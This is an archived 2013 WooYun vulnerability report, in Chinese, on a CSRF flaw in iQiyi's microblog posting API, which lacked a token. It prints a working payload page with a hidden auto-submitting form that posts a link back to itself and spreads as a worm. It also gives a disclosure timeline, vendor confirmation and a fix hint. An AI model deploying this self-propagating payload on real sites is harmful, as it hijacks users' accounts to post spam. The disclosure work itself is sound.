乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-09-10: 细节已通知厂商并且等待厂商处理中 2013-09-10: 厂商已经确认,细节仅向厂商公开 2013-09-20: 细节向核心白帽子及相关领域专家公开 2013-09-30: 细节向普通白帽子公开 2013-10-10: 细节向实习白帽子公开 2013-10-25: 细节向公众公开
在发展业务的同时也注意以下CSRF撒
问题应用:
http://t.iqiyi.com/home
发表"奇谈"的时候抓到了这个地址:
http://t.iqiyi.com/api/feed/addChat.php
没有token或者其他的随机参数。POST参数中:
<input type="hidden" name="requestMethod" value="POST"><input type="hidden" name="requestURL" value="http" value="//t.iqiyi.com/api/feed/addChat.php"><input type="hidden" name="notsync" value=""><input type="hidden" name="categoryid" value=""><input type="hidden" name="picid" value=""><input type="hidden" name="txt" value="test"><input type="hidden" name="tvid" value="0"><input type="hidden" name="cb" value="qitan_response_data"><input type="submit" value="ok">
构造一个payload:(http://cnhk.ml/qiyi/send.html)
<meta http-equiv="content-type" content="text/html;charset=utf-8"><h1>正在跳转...</h1><iframe id="test_iframe" style='display:none'></iframe><script>function CSRF(){ // test_iframe.document.write("<form id='test_form' action='http://t.iqiyi.com/api/feed/addChat.php' method='post' >" +"<input type='hidden' name='requestMethod' value='POST'>" +"<input type='hidden' name='requestURL' value='http' value='//t.iqiyi.com/api/feed/addChat.php'>" +"<input type='hidden' name='notsync' value=''>" +"<input type='hidden' name='categoryid' value=''>" +"<input type='hidden' name='picid' value=''>" +"<input type='hidden' name='txt' value='推荐一个好东西 http://cnhk.ml/qiyi/send.html'>" +"<input type='hidden' name='tvid' value='0'>" +"<input type='hidden' name='cb' value='qitan_response_data'>" +"<input type='submit' value='ok'>" +"</form>" +"<script>document.getElementById('test_form').submit();<\/script>" )}CSRF();window.setTimeout("window.location.href='http://threejs.org/'", 5000)//延迟二秒后跳转到指定网页</script>
当用户访问之后:
然后其他的用户看到点击之后继续发消息,构成蠕虫攻击...
控制访问来源
危害等级:中
漏洞Rank:5
确认时间:2013-09-10 14:02
谢谢提供!
暂无